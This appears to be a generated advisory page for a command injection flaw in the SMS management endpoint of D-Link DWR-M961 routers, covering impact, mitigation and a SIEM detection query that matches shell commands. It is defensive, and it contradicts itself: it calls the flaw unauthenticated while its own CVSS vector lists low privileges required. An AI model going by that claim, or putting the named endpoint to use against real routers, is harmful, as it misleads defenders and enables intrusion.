CVE-2026-1625 – This CVE describes a command injection vulnerab... (How to Fix)

📋 TL;DR

This CVE describes a command injection vulnerability in D-Link DWR-M961 routers that allows remote attackers to execute arbitrary commands on affected devices. The vulnerability exists in the SMS message management component and can be exploited without authentication. Organizations using DWR-M961 routers with vulnerable firmware are affected.

💻 Affected Systems

Products:

D-Link DWR-M961

Versions: Firmware version 1.1.47

Operating Systems: Embedded Linux

Default Config Vulnerable: ⚠️ Yes

Notes: All devices running the vulnerable firmware version are affected regardless of configuration.

📦 What is this software?

Dwr M961 Firmware by Dlink

View all CVEs affecting Dwr M961 Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of the router allowing attackers to establish persistent access, intercept network traffic, pivot to internal networks, and potentially brick the device.

🟠

Likely Case

Attackers gain shell access to the router, enabling them to modify configurations, install malware, or use the device as part of a botnet.

🟢

If Mitigated

With proper network segmentation and access controls, impact is limited to the router itself without lateral movement to other systems.

🌐 Internet-Facing: HIGH - The vulnerability can be exploited remotely without authentication on internet-facing routers.

🏢 Internal Only: MEDIUM - Internal routers could be exploited by compromised internal hosts or malicious insiders.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Public exploit details are available on GitHub, making exploitation straightforward for attackers with basic skills.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: https://www.dlink.com/

Restart Required: Yes

Instructions:

1. Check D-Link website for firmware updates
2. Download latest firmware if available
3. Upload via router admin interface
4. Reboot router after update

🔧 Temporary Workarounds

Disable SMS Management Interface

all

Disable the vulnerable SMS management component if not needed

Network Segmentation

all

Isolate router management interface from untrusted networks

🧯 If You Can't Patch

Remove internet-facing access to router management interface
Implement strict firewall rules to limit access to router from trusted IPs only

🔍 How to Verify

Check if Vulnerable:

Check router firmware version via admin interface. If version is 1.1.47, device is vulnerable.

Check Version:

Check via router web interface at System > Firmware or via SSH if enabled

Verify Fix Applied:

Verify firmware version has been updated to a version later than 1.1.47

📡 Detection & Monitoring

Log Indicators:

Unusual POST requests to /boafrm/formSmsManage
Suspicious command execution in system logs
Unexpected configuration changes

Network Indicators:

Unusual outbound connections from router
Traffic to known malicious IPs
Port scanning originating from router

SIEM Query:

source="router_logs" AND (uri="/boafrm/formSmsManage" OR command="*sh*" OR command="*bash*")

📊 Metadata

CVE ID: CVE-2026-1625

CVSS v3 Score: 6.3 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

CWE: CWE-74

EPSS Score: 0.84% exploit probability (74.2th percentile)

Published: January 29, 2026

Last Updated: February 20, 2026

🔗 References

https://github.com/QIU-DIE/CVE/issues/51 Broken Link,Issue Tracking
https://vuldb.com/?ctiid.343384 Permissions Required,VDB Entry
https://vuldb.com/?id.343384 Third Party Advisory,VDB Entry
https://vuldb.com/?submit.740792 Third Party Advisory,VDB Entry
https://www.dlink.com/ Product

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2026-1625, you might also want to check these: